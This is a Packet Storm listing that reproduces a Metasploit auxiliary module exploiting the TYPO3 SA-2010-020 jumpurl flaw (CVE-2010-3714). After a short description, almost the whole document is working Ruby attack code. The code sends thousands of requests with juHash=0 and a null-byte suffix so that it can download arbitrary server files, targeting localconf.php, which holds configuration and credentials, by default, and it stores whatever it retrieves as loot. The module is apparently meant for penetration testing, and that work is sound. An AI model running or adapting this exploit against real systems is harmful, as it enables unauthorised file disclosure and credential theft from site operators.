

TYPO3 Sa-2010-020 Remote File Disclosure

This Metasploit module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. This flaw can be used to read any file that the web server user account has access to view.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',      'Description' => %q{        This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.        Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.        This flaw can be used to read any file that the web server user account has access to view.      },      'References' => [        ['CVE', '2010-3714'],        ['URL', ''],        ['URL', ''],      ],      'Author' => [        'Chris John Riley',        'Gregor Kopf', # Original Discovery      ],      'License' => MSF_LICENSE    )    register_options(      ['URI', [true, 'TYPO3 Path', '/']),'RFILE', [true, 'The remote file to download', 'typo3conf/localconf.php']),'MAX_TRIES', [true, 'Maximum tries', 10000]),      ]    )  end  def run    # Add padding to bypass TYPO3 security filters    #    # Null byte fixed in PHP 5.3.4    #    case datastore['RFILE']    when nil      # Nothing    when /localconf\.php$/i      jumpurl = "#{datastore['RFILE']}%00/."    when %r{^\.\.(/|\\)}i      print_error('Directory traversal detected... you might want to start that with a /.. or \\..')    else      jumpurl = datastore['RFILE'].to_s    end    print_status("Establishing a connection to #{rhost}:#{rport}")    print_status("Trying to retrieve #{datastore['RFILE']}")    location_base = Rex::Text.rand_text_numeric(1)    counter = 0    queue = []    print_status('Creating request queue')    1.upto(datastore['MAX_TRIES']) do      counter += 1      locationData = "#{location_base}::#{counter}"      queue << "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0"      if ((counter.to_f / datastore['MAX_TRIES'].to_f) * 100.0).to_s =~ /(25|50|75|100).0$/ # Display percentage complete every 25%        percentage = (counter.to_f / datastore['MAX_TRIES'].to_f) * 100        print_status("Queue #{percentage.to_i}% compiled - [#{counter} / #{datastore['MAX_TRIES']}]")      end    end    print_status('Queue compiled. Beginning requests... grab a coffee!')    counter = 0    queue.each do |check|      counter += 1      check = check.sub('//', '/') # Prevent double // from appearing in uri      begin        file = send_request_raw({          'uri'  => check,          'method'  => 'GET',          'headers'  =>            {              'Connection' => 'Close'            }        }, 25)      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout        return      rescue ::Timeout::Error, ::Errno::EPIPE => e        print_error(e.message)        return      end      if file.nil?        print_error('Connection timed out')        return      end      if ((counter.to_f / queue.length.to_f) * 100.0).to_s =~ /\d0.0$/ # Display percentage complete every 10%        percentage = (counter.to_f / queue.length.to_f) * 100.0        print_status("Requests #{percentage.to_i}% complete - [#{counter} / #{queue.length}]")      end      # file can be nil      case file.headers['Content-Type']      when 'text/html'        case file.body        when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'          print_error("File #{datastore['RFILE']} does not exist.")          return        when /jumpurl Secure: locationData/i          print_error("File #{datastore['RFILE']} is not accessible.")          return        when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'          print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")          return        end      when 'application/octet-stream'        addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB        print_good('Found matching hash')        print_good('Writing local file ' + File.basename(datastore['RFILE'].downcase) + ' to loot')        store_loot('typo3_' + File.basename(datastore['RFILE'].downcase), 'text/xml', addr, file.body, 'typo3_' + File.basename(datastore['RFILE'].downcase), 'Typo3_sa_2010_020')        return      end    end    print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}")  endend

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